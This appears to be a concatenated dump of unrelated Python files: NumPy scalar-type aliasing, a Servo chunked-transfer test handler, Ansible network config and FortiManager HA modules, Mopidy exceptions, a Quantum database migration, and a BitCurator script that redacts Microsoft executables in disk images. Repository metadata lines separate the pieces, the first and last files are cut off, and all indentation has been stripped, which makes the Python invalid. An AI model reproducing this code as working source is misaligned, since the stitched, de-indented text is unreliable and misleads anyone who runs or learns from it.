charname = 'i%d' % (bits//8,)
ucharname = 'u%d' % (bits//8,)
intname = 'int%d' % bits
UIntname = 'UInt%d' % bits
Intname = 'Int%d' % bits
uval = typeinfo['U'+ctype]
typeobj = val[-1]
utypeobj = uval[-1]
if intname not in allTypes.keys():
uintname = 'uint%d' % bits
allTypes[intname] = typeobj
allTypes[uintname] = utypeobj
sctypeDict[intname] = typeobj
sctypeDict[uintname] = utypeobj
sctypeDict[Intname] = typeobj
sctypeDict[UIntname] = utypeobj
sctypeDict[charname] = typeobj
sctypeDict[ucharname] = utypeobj
sctypeNA[Intname] = typeobj
sctypeNA[UIntname] = utypeobj
sctypeNA[charname] = typeobj
sctypeNA[ucharname] = utypeobj
sctypeNA[typeobj] = Intname
sctypeNA[utypeobj] = UIntname
sctypeNA[val[0]] = Intname
sctypeNA[uval[0]] = UIntname
_add_integer_aliases()
# We use these later
void = allTypes.get('void')
generic = allTypes.get('generic')
#
# Rework the Python names (so that float and complex and int are consistent
# with Python usage)
#
def _set_up_aliases():
type_pairs = [('complex_', 'cdouble'),
('int0', 'intp'),
('uint0', 'uintp'),
('single', 'float'),
('csingle', 'cfloat'),
('singlecomplex', 'cfloat'),
('float_', 'double'),
('intc', 'int'),
('uintc', 'uint'),
('int_', 'long'),
('uint', 'ulong'),
('cfloat', 'cdouble'),
('longfloat', 'longdouble'),
('clongfloat', 'clongdouble'),
('longcomplex', 'clongdouble'),
('bool_', 'bool'),
('unicode_', 'unicode'),
('object_', 'object'),
('timedelta_', 'timedelta'),
('datetime_', 'datetime')]
if sys.version_info[0] >= 3:
type_pairs.extend([('bytes_', 'string'),
('str_', 'unicode'),
('string_', 'string')])
else:
type_pairs.extend([('str_', 'string'),
('string_', 'string'),
('bytes_', 'string')])
for alias, t in type_pairs:
if t in allTypes:
allTypes[alias] = allTypes[t]
if t in sctypeDict:
sctypeDict[alias] = sctypeDict[t]
# Remove aliases overriding python types and modules
to_remove = ['ulong', 'object', 'unicode', 'int', 'long', 'float',
'complex', 'bool', 'string', 'datetime', 'timedelta']
if sys.version_info[0] >= 3:
# Py3K
to_remove.append('bytes')
to_remove.append('str')
to_remove.remove('unicode')
to_remove.remove('long')
for t in to_remove:
try:
del allTypes[t]
del sctypeDict[t]
except KeyError:
pass
_set_up_aliases()
# Now, construct dictionary to lookup character codes from types
_sctype2char_dict = {}
def _construct_char_code_lookup():
for name in typeinfo.keys():
tup = typeinfo[name]
if isinstance(tup, tuple):
if tup[0] not in ['p','P']:
_sctype2char_dict[tup[-1]] = tup[0]
_construct_char_code_lookup()
sctypes = {'int': [],
'uint':[],
'float':[],
'complex':[],
'others':[bool,object,str,unicode,void]}
def _add_array_type(typename, bits):
try:
t = allTypes['%s%d' % (typename, bits)]
except KeyError:
pass
else:
sctypes[typename].append(t)
def _set_array_types():
ibytes = [1, 2, 4, 8, 16, 32, 64]
fbytes = [2, 4, 8, 10, 12, 16, 32, 64]
for bytes in ibytes:
bits = 8*bytes
_add_array_type('int', bits)
_add_array_type('uint', bits)
for bytes in fbytes:
bits = 8*bytes
_add_array_type('float', bits)
_add_array_type('complex', 2*bits)
_gi = dtype('p')
if _gi.type not in sctypes['int']:
indx = 0
sz = _gi.itemsize
_lst = sctypes['int']
while (indx < len(_lst) and sz >= _lst[indx](0).itemsize):
indx += 1
sctypes['int'].insert(indx, _gi.type)
sctypes['uint'].insert(indx, dtype('P').type)
_set_array_types()
genericTypeRank = ['bool', 'int8', 'uint8', 'int16', 'uint16',
'int32', 'uint32', 'int64', 'uint64', 'int128',
'uint128', 'float16',
'float32', 'float64', 'float80', 'float96', 'float128',
'float256',
'complex32', 'complex64', 'complex128', 'complex160',
'complex192', 'complex256', 'complex512', 'object']
def maximum_sctype(t):
"""
Return the scalar type of highest precision of the same kind as the input.
Parameters
----------
t : dtype or dtype specifier
The input data type. This can be a `dtype` object or an object that
is convertible to a `dtype`.
Returns
-------
out : dtype
The highest precision data type of the same kind (`dtype.kind`) as `t`.
See Also
--------
obj2sctype, mintypecode, sctype2char
dtype
Examples
--------
>>> np.maximum_sctype(np.int)
<type 'numpy.int64'>
>>> np.maximum_sctype(np.uint8)
<type 'numpy.uint64'>
>>> np.maximum_sctype(np.complex)
<type 'numpy.complex192'>
>>> np.maximum_sctype(str)
<type 'numpy.string_'>
>>> np.maximum_sctype('i2')
<type 'numpy.int64'>
>>> np.maximum_sctype('f4')
<type 'numpy.float96'>
"""
g = obj2sctype(t)
if g is None:
return t
t = g
name = t.__name__
base, bits = _evalname(name)
if bits == 0:
return t
else:
return sctypes[base][-1]
try:
buffer_type = _types.BufferType
except AttributeError:
# Py3K
buffer_type = memoryview
_python_types = {int : 'int_',
float: 'float_',
complex: 'complex_',
bool: 'bool_',
bytes: 'bytes_',
unicode: 'unicode_',
buffer_type: 'void',
}
if sys.version_info[0] >= 3:
def _python_type(t):
"""returns the type corresponding to a certain Python type"""
if not isinstance(t, type):
t = type(t)
return allTypes[_python_types.get(t, 'object_')]
else:
def _python_type(t):
"""returns the type corresponding to a certain Python type"""
if not isinstance(t, _types.TypeType):
t = type(t)
return allTypes[_python_types.get(t, 'object_')]
def issctype(rep):
"""
Determines whether the given object represents a scalar data-type.
Parameters
----------
rep : any
If `rep` is an instance of a scalar dtype, True is returned. If not,
False is returned.
Returns
-------
out : bool
Boolean result of check whether `rep` is a scalar dtype.
See Also
--------
issubsctype, issubdtype, obj2sctype, sctype2char
Examples
--------
>>> np.issctype(np.int32)
True
>>> np.issctype(list)
False
>>> np.issctype(1.1)
False
"""
if not isinstance(rep, (type, dtype)):
return False
try:
res = obj2sctype(rep)
if res and res != object_:
return True
return False
except:
return False
def obj2sctype(rep, default=None):
try:
if issubclass(rep, generic):
return rep
except TypeError:
pass
if isinstance(rep, dtype):
return rep.type
if isinstance(rep, type):
return _python_type(rep)
if isinstance(rep, ndarray):
return rep.dtype.type
try:
res = dtype(rep)
except:
return default
return res.type
def issubclass_(arg1, arg2):
try:
return issubclass(arg1, arg2)
except TypeError:
return False
def issubsctype(arg1, arg2):
"""
Determine if the first argument is a subclass of the second argument.
Parameters
----------
arg1, arg2 : dtype or dtype specifier
Data-types.
Returns
-------
out : bool
The result.
See Also
--------
issctype, issubdtype,obj2sctype
Examples
--------
>>> np.issubsctype('S8', str)
True
>>> np.issubsctype(np.array([1]), np.int)
True
>>> np.issubsctype(np.array([1]), np.float)
False
"""
return issubclass(obj2sctype(arg1), obj2sctype(arg2))
def issubdtype(arg1, arg2):
"""
Returns True if first argument is a typecode lower/equal in type hierarchy.
Parameters
----------
arg1, arg2 : dtype_like
dtype or string representing a typecode.
Returns
-------
out : bool
See Also
--------
issubsctype, issubclass_
numpy.core.numerictypes : Overview of numpy type hierarchy.
Examples
--------
>>> np.issubdtype('S1', str)
True
>>> np.issubdtype(np.float64, np.float32)
False
"""
if issubclass_(arg2, generic):
return issubclass(dtype(arg1).type, arg2)
mro = dtype(arg2).type.mro()
if len(mro) > 1:
val = mro[1]
else:
val = mro[0]
return issubclass(dtype(arg1).type, val)
# This dictionary allows look up based on any alias for an array data-type
class _typedict(dict):
"""
Base object for a dictionary for look-up with any alias for an array dtype.
Instances of `_typedict` can not be used as dictionaries directly,
first they have to be populated.
"""
def __getitem__(self, obj):
return dict.__getitem__(self, obj2sctype(obj))
nbytes = _typedict()
_alignment = _typedict()
_maxvals = _typedict()
_minvals = _typedict()
def _construct_lookups():
for name, val in typeinfo.iteritems():
if not isinstance(val, tuple):
continue
obj = val[-1]
nbytes[obj] = val[2] // 8
_alignment[obj] = val[3]
if (len(val) > 5):
_maxvals[obj] = val[4]
_minvals[obj] = val[5]
else:
_maxvals[obj] = None
_minvals[obj] = None
_construct_lookups()
def sctype2char(sctype):
"""
Return the string representation of a scalar dtype.
Parameters
----------
sctype : scalar dtype or object
If a scalar dtype, the corresponding string character is
returned. If an object, `sctype2char` tries to infer its scalar type
and then return the corresponding string character.
Returns
-------
typechar : str
The string character corresponding to the scalar type.
Raises
------
ValueError
If `sctype` is an object for which the type can not be inferred.
See Also
--------
obj2sctype, issctype, issubsctype, mintypecode
Examples
--------
>>> for sctype in [np.int32, np.float, np.complex, np.string_, np.ndarray]:
... print np.sctype2char(sctype)
l
d
D
S
O
>>> x = np.array([1., 2-1.j])
>>> np.sctype2char(x)
'D'
>>> np.sctype2char(list)
'O'
"""
sctype = obj2sctype(sctype)
if sctype is None:
raise ValueError, "unrecognized type"
return _sctype2char_dict[sctype]
# Create dictionary of casting functions that wrap sequences
# indexed by type or type character
cast = _typedict()
try:
ScalarType = [_types.IntType, _types.FloatType, _types.ComplexType,
_types.LongType, _types.BooleanType,
_types.StringType, _types.UnicodeType, _types.BufferType]
except AttributeError:
# Py3K
ScalarType = [int, float, complex, long, bool, bytes, str, memoryview]
ScalarType.extend(_sctype2char_dict.keys())
ScalarType = tuple(ScalarType)
for key in _sctype2char_dict.keys():
cast[key] = lambda x, k=key : array(x, copy=False).astype(k)
# Create the typestring lookup dictionary
_typestr = _typedict()
for key in _sctype2char_dict.keys():
if issubclass(key, allTypes['flexible']):
_typestr[key] = _sctype2char_dict[key]
else:
_typestr[key] = empty((1,),key).dtype.str[1:]
# Make sure all typestrings are in sctypeDict
for key, val in _typestr.items():
if val not in sctypeDict:
sctypeDict[val] = key
# Add additional strings to the sctypeDict
if sys.version_info[0] >= 3:
_toadd = ['int', 'float', 'complex', 'bool', 'object',
'str', 'bytes', 'object', ('a', allTypes['bytes_'])]
else:
_toadd = ['int', 'float', 'complex', 'bool', 'object', 'string',
('str', allTypes['string_']),
'unicode', 'object', ('a', allTypes['string_'])]
for name in _toadd:
if isinstance(name, tuple):
sctypeDict[name[0]] = name[1]
else:
key = '%s_' % name
if key in allTypes:
sctypeDict[name] = allTypes['%s_' % name]
del _toadd, name
# Now add the types we've determined to this module
for key in allTypes:
globals()[key] = allTypes[key]
__all__.append(key)
del key
typecodes = {'Character':'c',
'Integer':'bhilqp',
'UnsignedInteger':'BHILQP',
'Float':'fdg',
'Complex':'FDG',
'AllInteger':'bBhHiIlLqQpP',
'AllFloat':'fdgFDG',
'Datetime': 'Mm',
'All':'?bhilqpBHILQPfdgFDGSUVOMm'}
# backwards compatibility --- deprecated name
typeDict = sctypeDict
typeNA = sctypeNA
# b -> boolean
# u -> unsigned integer
# i -> signed integer
# f -> floating point
# c -> complex
# M -> datetime
# m -> timedelta
# S -> string
# U -> Unicode string
# V -> record
# O -> Python object
_kind_list = ['b', 'u', 'i', 'f', 'c', 'S', 'U', 'V', 'O', 'M', 'm']
__test_types = typecodes['AllInteger'][:-2]+typecodes['AllFloat']+'O'
__len_test_types = len(__test_types)
# Keep incrementing until a common type both can be coerced to
# is found. Otherwise, return None
def _find_common_coerce(a, b):
if a > b:
return a
try:
thisind = __test_types.index(a.char)
except ValueError:
return None
return _can_coerce_all([a,b], start=thisind)
# Find a data-type that all data-types in a list can be coerced to
def _can_coerce_all(dtypelist, start=0):
N = len(dtypelist)
if N == 0:
return None
if N == 1:
return dtypelist[0]
thisind = start
while thisind < __len_test_types:
newdtype = dtype(__test_types[thisind])
numcoerce = len([x for x in dtypelist if newdtype >= x])
if numcoerce == N:
return newdtype
thisind += 1
return None
def find_common_type(array_types, scalar_types):
"""
Determine common type following standard coercion rules.
Parameters
----------
array_types : sequence
A list of dtypes or dtype convertible objects representing arrays.
scalar_types : sequence
A list of dtypes or dtype convertible objects representing scalars.
Returns
-------
datatype : dtype
The common data type, which is the maximum of `array_types` ignoring
`scalar_types`, unless the maximum of `scalar_types` is of a
different kind (`dtype.kind`). If the kind is not understood, then
None is returned.
See Also
--------
dtype, common_type, can_cast, mintypecode
Examples
--------
>>> np.find_common_type([], [np.int64, np.float32, np.complex])
dtype('complex128')
>>> np.find_common_type([np.int64, np.float32], [])
dtype('float64')
The standard casting rules ensure that a scalar cannot up-cast an
array unless the scalar is of a fundamentally different kind of data
(i.e. under a different hierarchy in the data type hierarchy) then
the array:
>>> np.find_common_type([np.float32], [np.int64, np.float64])
dtype('float32')
Complex is of a different type, so it up-casts the float in the
`array_types` argument:
>>> np.find_common_type([np.float32], [np.complex])
dtype('complex128')
Type specifier strings are convertible to dtypes and can therefore
be used instead of dtypes:
>>> np.find_common_type(['f4', 'f4', 'i4'], ['c8'])
dtype('complex128')
"""
array_types = [dtype(x) for x in array_types]
scalar_types = [dtype(x) for x in scalar_types]
maxa = _can_coerce_all(array_types)
maxsc = _can_coerce_all(scalar_types)
if maxa is None:
return maxsc
if maxsc is None:
return maxa
try:
index_a = _kind_list.index(maxa.kind)
index_sc = _kind_list.index(maxsc.kind)
except ValueError:
return None
if index_sc > index_a:
return _find_common_coerce(maxsc,maxa)
else:
return maxa
|
jxs/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/XMLHttpRequest/resources/chunked.py
|
219
|
def main(request, response):
chunks = ["First chunk\r\n",
"Second chunk\r\n",
"Yet another (third) chunk\r\n",
"Yet another (fourth) chunk\r\n",
]
response.headers.set("Transfer-Encoding", "chunked");
response.headers.set("Trailer", "X-Test-Me");
response.headers.set("Content-Type", "text/plain");
response.write_status_headers()
for value in chunks:
response.writer.write("%x\r\n" % len(value))
response.writer.write(value)
response.writer.write("\r\n")
response.writer.write("0\r\n")
response.writer.write("X-Test-Me: Trailer header value\r\n\r\n")
|
noroutine/ansible
|
refs/heads/devel
|
lib/ansible/plugins/action/net_config.py
|
137
|
#
# Copyright 2015 Peter Sprygada <psprygada@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
import time
import glob
from ansible.plugins.action.normal import ActionModule as _ActionModule
from ansible.module_utils._text import to_text
from ansible.module_utils.six.moves.urllib.parse import urlsplit
from ansible.utils.vars import merge_hash
PRIVATE_KEYS_RE = re.compile('__.+__')
class ActionModule(_ActionModule):
def run(self, tmp=None, task_vars=None):
if self._task.args.get('src'):
try:
self._handle_template()
except ValueError as exc:
return dict(failed=True, msg=exc.message)
result = super(ActionModule, self).run(tmp, task_vars)
if self._task.args.get('backup') and result.get('__backup__'):
# User requested backup and no error occurred in module.
# NOTE: If there is a parameter error, _backup key may not be in results.
filepath = self._write_backup(task_vars['inventory_hostname'],
result['__backup__'])
result['backup_path'] = filepath
# strip out any keys that have two leading and two trailing
# underscore characters
for key in result.keys():
if PRIVATE_KEYS_RE.match(key):
del result[key]
return result
def _get_working_path(self):
cwd = self._loader.get_basedir()
if self._task._role is not None:
cwd = self._task._role._role_path
return cwd
def _write_backup(self, host, contents):
backup_path = self._get_working_path() + '/backup'
if not os.path.exists(backup_path):
os.mkdir(backup_path)
for fn in glob.glob('%s/%s*' % (backup_path, host)):
os.remove(fn)
tstamp = time.strftime("%Y-%m-%d@%H:%M:%S", time.localtime(time.time()))
filename = '%s/%s_config.%s' % (backup_path, host, tstamp)
open(filename, 'w').write(contents)
return filename
def _handle_template(self):
src = self._task.args.get('src')
working_path = self._get_working_path()
if os.path.isabs(src) or urlsplit('src').scheme:
source = src
else:
source = self._loader.path_dwim_relative(working_path, 'templates', src)
if not source:
source = self._loader.path_dwim_relative(working_path, src)
if not os.path.exists(source):
raise ValueError('path specified in src not found')
try:
with open(source, 'r') as f:
template_data = to_text(f.read())
except IOError:
return dict(failed=True, msg='unable to load src file')
# Create a template search path in the following order:
# [working_path, self_role_path, dependent_role_paths, dirname(source)]
searchpath = [working_path]
if self._task._role is not None:
searchpath.append(self._task._role._role_path)
if hasattr(self._task, "_block:"):
dep_chain = self._task._block.get_dep_chain()
if dep_chain is not None:
for role in dep_chain:
searchpath.append(role._role_path)
searchpath.append(os.path.dirname(source))
self._templar.environment.loader.searchpath = searchpath
self._task.args['src'] = self._templar.template(template_data)
|
liamw9534/mopidy
|
refs/heads/master
|
mopidy/exceptions.py
|
1
|
from __future__ import unicode_literals
class MopidyException(Exception):
def __init__(self, message, *args, **kwargs):
super(MopidyException, self).__init__(message, *args, **kwargs)
self._message = message
@property
def message(self):
"""Reimplement message field that was deprecated in Python 2.6"""
return self._message
@message.setter # noqa
def message(self, message):
self._message = message
class BackendError(MopidyException):
pass
class ExtensionError(MopidyException):
pass
class FrontendError(MopidyException):
pass
class MixerError(MopidyException):
pass
class ScannerError(MopidyException):
pass
|
linvictor88/vse-lbaas-driver
|
refs/heads/master
|
quantum/db/migration/alembic_migrations/common_ext_ops.py
|
20
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 Openstack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Upgrade/downgrade operations for 'community' extensions
"""
from alembic import op
import sqlalchemy as sa
def upgrade_l3():
op.create_table(
'routers',
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('status', sa.String(length=16), nullable=True),
sa.Column('admin_state_up', sa.Boolean(), nullable=True),
sa.Column('gw_port_id', sa.String(length=36), nullable=True),
sa.ForeignKeyConstraint(['gw_port_id'], ['ports.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table(
'externalnetworks',
sa.Column('network_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['network_id'], ['networks.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('network_id')
)
op.create_table(
'floatingips',
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('floating_ip_address', sa.String(length=64), nullable=False),
sa.Column('floating_network_id', sa.String(length=36), nullable=False),
sa.Column('floating_port_id', sa.String(length=36), nullable=False),
sa.Column('fixed_port_id', sa.String(length=36), nullable=True),
sa.Column('fixed_ip_address', sa.String(length=64), nullable=True),
sa.Column('router_id', sa.String(length=36), nullable=True),
sa.ForeignKeyConstraint(['fixed_port_id'], ['ports.id'], ),
sa.ForeignKeyConstraint(['floating_port_id'], ['ports.id'], ),
sa.ForeignKeyConstraint(['router_id'], ['routers.id'], ),
sa.PrimaryKeyConstraint('id')
)
def upgrade_quota(options=None):
if not (options or {}).get('folsom_quota_db_enabled'):
return
op.create_table(
'quotas',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('tenant_id', sa.String(255), index=True),
sa.Column('resource', sa.String(255)),
sa.Column('limit', sa.Integer()),
sa.PrimaryKeyConstraint('id')
)
def downgrade_l3():
for table in ('floatingips', 'routers', 'externalnetworks'):
op.drop_table(table)
def downgrade_quota(options=None):
if (options or {}).get('folsom_quota_db_enabled'):
op.drop_table('quotas')
|
pombredanne/bitcurator
|
refs/heads/master
|
dfxml/python/imicrosoft_redact.py
|
4
|
#!/usr/bin/python
"""This is a small program written with the python fiwalk framework to
break the microsoft executables from the m57 corpus. It does this by changing
characters in the first 4096 bytes of the executable that are over hex 80 to
hex FF"""
import os.path,sys
from subprocess import Popen,call,PIPE
sys.path.append(os.getenv("DOMEX_HOME") + "/src/lib/") # add the library
sys.path.append(os.getenv("DOMEX_HOME") + "/src/fiwalk/python/") # add the library
import fiwalk,hashlib
import xml.parsers.expat
redact_extensions = set([".dll",".exe",".com"])
redact_filenames = set()
redact_max_size = 4096
def should_redact(fi):
if fi.filename() in redact_filenames: return True
fnl = fi.filename().lower()
(root,ext) = os.path.splitext(fnl)
if options.debug: print "\r",fnl,
if ext in redact_extensions and fnl.startswith("windows"):
try:
content = fi.contents(icat_fallback=False)
except ValueError:
if options.debug: print " *** can't redact --- is compressed *** "
return False
if not content:
if options.debug: print " *** can't redact --- no content ***"
return False
if "Microsoft" in content:
return True
if "\0M\0i\0c\0r\0o\0s\0o\0f\0t" in content:
return True
if options.debug: print " *** won't redact --- no Microsoft ***"
return False
return False
def redact(fi):
from xml.sax.saxutils import escape
global xml_out,options
if not should_redact(fi): return
# Get the first byterun
br = fi.byte_runs()[0]
if br.img_offset==0: return # this run isn't on the disk
if br.bytes==0: return # too small to redact
content = fi.contents() # before redaction
redact_bytes = min(redact_max_size,br.bytes)
fi.imagefile.seek(br.img_offset)
sector = fi.imagefile.read(redact_bytes)
# Redact the sector
# Read the data
def redact_function(ch):
if ch<'~': return ch
return '0xff'
sector = "".join(map(redact_function,sector))
# Now write it back
if options.commit:
fi.imagefile.seek(br.img_offset)
fi.imagefile.write(sector)
redacted_content = fi.contents() # after redaction
xml_out.write("<fileobject>\n<filename>%s</filename>\n" % (escape(fi.filename())))
xml_out.write(" <filesize>%d</filesize>\n" % (len(content)))
xml_out.write(" <inode>%s</inode>\n" % (fi.inode()))
xml_out.write(" <redact_image_offset>%d</redact_image_offset>\n" % (br.img_offset))
xml_out.write(" <redact_bytes>%d</redact_bytes>\n" % (redact_bytes))
xml_out.write(" <before_redact>\n")
xml_out.write(" <hashdigest type='MD5'>%s</hashdigest>\n" % (hashlib.md5(content).hexdigest()))
xml_out.write(" <hashdigest type='SHA1'>%s</hashdigest>\n" % (hashlib.sha1(content).hexdigest()))
xml_out.write(" </before_redact>\n")
xml_out.write(" <after_redact>\n")
xml_out.write(" <hashdigest type='MD5'>%s</hashdigest>\n" % (hashlib.md5(redacted_content).hexdigest()))
xml_out.write(" <hashdigest type='SHA1'>%s</hashdigest>\n" % (hashlib.sha1(redacted_content).hexdigest()))
xml_out.write(" </after_redact>\n")
xml_out.write("</fileobject>\n")
if __name__=="__main__":
import sys,time
from optparse import OptionParser
from subprocess import Popen,PIPE
global options,xml_out
from glob import glob
parser = OptionParser()
parser.usage = "%prog [options] imagefile"
parser.add_option("-d","--debug",help="prints debugging info",dest="debug",action="store_true")
parser.add_option("-c","--commit",help="Really do the redaction",action="store_true")
parser.add_option("--all",help="Do all",action="store_true")
(options,args) = parser.parse_args()
# First read all of the redaction files
for fn in glob("*redacted.xml*"):
try:
fiwalk.fiwalk_using_sax(xmlfile=open(fn),callback=lambda fi:redact_filenames.add(fi.filename()))
except xml.parsers.expat.ExpatError:
print "Invalid XML file:",fn
print "number of filenames in redaction XML:",len(redact_filenames)
if options.all:
for fn in glob("*.aff"):
raw = fn.replace(".aff",".raw")
if not os.path.exists(raw):
print "%s --> %s" % (fn,raw)
if call(['afconvert','-e','raw',fn])!=0:
raise RuntimeError,"afconvert of %s failed" % fn
fns = glob("*.raw")
else:
fns = args
for fn in fns:
if fn.endswith(".aff"):
raise ValueError,"Cannot redact AFF files"
print "Redacting %s" % fn
xml_out = open(fn.replace(".raw","-redacted.xml"),"w")
xml_out.write("<?xml version='1.0' encoding='ISO-8859-1'?>\n")
xml_out.write("<redaction_report>\n")
mode = "rb"
if options.commit: mode="r+b"
fiwalk.fiwalk_using_sax(imagefile=open(args[0],mode),callback=redact)
xml_out.write("</redaction_report>\n")
|
shsingh/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/fortimanager/fmgr_ha.py
|
38
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community"
}
DOCUMENTATION = '''
---
module: fmgr_ha
version_added: "2.8"
notes:
- Full Documentation at U(https://ftnt-ansible-docs.readthedocs.io/en/latest/).
author:
- Luke Weighall (@lweighall)
- Andrew Welsh (@Ghilli3)
- Jim Huber (@p4r4n0y1ng)
short_description: Manages the High-Availability State of FortiManager Clusters and Nodes.
description: Change HA state or settings of FortiManager nodes (Standalone/Master/Slave).
options:
fmgr_ha_mode:
description:
- Sets the role of the FortiManager host for HA.
required: false
choices: ["standalone", "master", "slave"]
fmgr_ha_peer_ipv4:
description:
- Sets the IPv4 address of a HA peer.
required: false
fmgr_ha_peer_ipv6:
description:
- Sets the IPv6 address of a HA peer.
required: false
fmgr_ha_peer_sn:
description:
- Sets the HA Peer Serial Number.
required: false
fmgr_ha_peer_status:
description:
- Sets the peer status to enable or disable.
required: false
choices: ["enable", "disable"]
fmgr_ha_cluster_pw:
description:
- Sets the password for the HA cluster. Only required once. System remembers between HA mode switches.
required: false
fmgr_ha_cluster_id:
description:
- Sets the ID number of the HA cluster. Defaults to 1.
required: false
default: 1
fmgr_ha_hb_threshold:
description:
- Sets heartbeat lost threshold (1-255).
required: false
default: 3
fmgr_ha_hb_interval:
description:
- Sets the heartbeat interval (1-255).
required: false
default: 5
fmgr_ha_file_quota:
description:
- Sets the File quota in MB (2048-20480).
required: false
default: 4096
'''
EXAMPLES = '''
- name: SET FORTIMANAGER HA NODE TO MASTER
fmgr_ha:
fmgr_ha_mode: "master"
fmgr_ha_cluster_pw: "fortinet"
fmgr_ha_cluster_id: "1"
- name: SET FORTIMANAGER HA NODE TO SLAVE
fmgr_ha:
fmgr_ha_mode: "slave"
fmgr_ha_cluster_pw: "fortinet"
fmgr_ha_cluster_id: "1"
- name: SET FORTIMANAGER HA NODE TO STANDALONE
fmgr_ha:
fmgr_ha_mode: "standalone"
- name: ADD FORTIMANAGER HA PEER
fmgr_ha:
fmgr_ha_peer_ipv4: "192.168.1.254"
fmgr_ha_peer_sn: "FMG-VM1234567890"
fmgr_ha_peer_status: "enable"
- name: CREATE CLUSTER ON MASTER
fmgr_ha:
fmgr_ha_mode: "master"
fmgr_ha_cluster_pw: "fortinet"
fmgr_ha_cluster_id: "1"
fmgr_ha_hb_threshold: "10"
fmgr_ha_hb_interval: "15"
fmgr_ha_file_quota: "2048"
'''
RETURN = """
api_result:
description: full API response, includes status code and message
returned: always
type: str
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortimanager.fortimanager import FortiManagerHandler
from ansible.module_utils.network.fortimanager.common import FMGBaseException
from ansible.module_utils.network.fortimanager.common import FMGRCommon
from ansible.module_utils.network.fortimanager.common import FMGRMethods
from ansible.module_utils.network.fortimanager.common import DEFAULT_RESULT_OBJ
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def fmgr_set_ha_mode(fmgr, paramgram):
"""
:param fmgr: The fmgr object instance from fortimanager.py
:type fmgr: class object
:param paramgram: The formatted dictionary of options to process
:type paramgram: dict
:return: The response from the FortiManager
:rtype: dict
"""
# INIT A BASIC OBJECTS
response = DEFAULT_RESULT_OBJ
url = ""
datagram = {}
if paramgram["fmgr_ha_cluster_pw"] is not None and str(paramgram["fmgr_ha_mode"].lower()) != "standalone":
datagram = {
"mode": paramgram["fmgr_ha_mode"],
"file-quota": paramgram["fmgr_ha_file_quota"],
"hb-interval": paramgram["fmgr_ha_hb_interval"],
"hb-lost-threshold": paramgram["fmgr_ha_hb_threshold"],
"password": paramgram["fmgr_ha_cluster_pw"],
"clusterid": paramgram["fmgr_ha_cluster_id"]
}
elif str(paramgram["fmgr_ha_mode"].lower()) == "standalone":
datagram = {
"mode": paramgram["fmgr_ha_mode"],
"file-quota": paramgram["fmgr_ha_file_quota"],
"hb-interval": paramgram["fmgr_ha_hb_interval"],
"hb-lost-threshold": paramgram["fmgr_ha_hb_threshold"],
"clusterid": paramgram["fmgr_ha_cluster_id"]
}
url = '/cli/global/system/ha'
response = fmgr.process_request(url, datagram, FMGRMethods.SET)
return response
def fmgr_get_ha_peer_list(fmgr):
"""
:param fmgr: The fmgr object instance from fortimanager.py
:type fmgr: class object
:param paramgram: The formatted dictionary of options to process
:type paramgram: dict
:return: The response from the FortiManager
:rtype: dict
"""
# INIT A BASIC OBJECTS
response = DEFAULT_RESULT_OBJ
datagram = {}
paramgram = {}
url = '/cli/global/system/ha/peer/'
response = fmgr.process_request(url, datagram, FMGRMethods.GET)
return response
def fmgr_set_ha_peer(fmgr, paramgram):
"""
:param fmgr: The fmgr object instance from fortimanager.py
:type fmgr: class object
:param paramgram: The formatted dictionary of options to process
:type paramgram: dict
:return: The response from the FortiManager
:rtype: dict
"""
datagram = {
"ip": paramgram["fmgr_ha_peer_ipv4"],
"ip6": paramgram["fmgr_ha_peer_ipv6"],
"serial-number": paramgram["fmgr_ha_peer_sn"],
"status": paramgram["fmgr_ha_peer_status"],
"id": paramgram["peer_id"]
}
url = '/cli/global/system/ha/peer/'
response = fmgr.process_request(url, datagram, FMGRMethods.SET)
return response
def main():
argument_spec = dict(
fmgr_ha_mode=dict(required=False, type="str", choices=["standalone", "master", "slave"]),
fmgr_ha_cluster_pw=dict(required=False, type="str", no_log=True),
fmgr_ha_peer_status=dict(required=False, type="str", choices=["enable", "disable"]),
fmgr_ha_peer_sn=dict(required=False, type="str"),
fmgr_ha_peer_ipv4=dict(required=False, type="str"),
fmgr_ha_peer_ipv6=dict(required=False, type="str"),
